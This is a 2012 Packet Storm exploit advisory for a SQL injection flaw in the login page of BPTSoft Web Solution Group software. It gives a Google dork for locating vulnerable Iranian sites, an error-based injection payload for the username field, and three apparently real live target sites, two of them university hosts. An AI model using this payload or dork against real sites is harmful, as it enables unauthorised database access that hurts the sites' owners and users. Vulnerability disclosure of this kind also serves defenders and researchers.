BPTSoft Web Solution Group suffers from a remote SQL injection vulnerability.
5169a688f7919e9fd145b6dc47d0fff2############################### HUT CNIS #############################
# Exploit Title: BPTSoft Web Solution Group SQL INJECTION Vulnerability
# Date: [2012/1/1]
# Author: S.Azadi
# Google Dork: site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group
# Vulnerability Type: SQL Injection
# Version: 2005-2009
#---------------------------------------------------------------------
Technical Details:
- SQL INJECTION:
There is a SQLI vulnerability in “Default.aspx” , in username textbox.
PoC:
http://sitename/Default.aspx || Enter in username textbox: ' and 1=convert(int,(select @@version))--
sample code for username textbox: ' and 1=convert(int,(select @@version))--
http://fish.ghec.ac.ir/Default.aspx
http://95.82.105.54/Default.aspx
http://salary.yazduni.ac.ir/Default.aspx
#
#
#
###########- HUT Center for Network and Information Security -##########
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!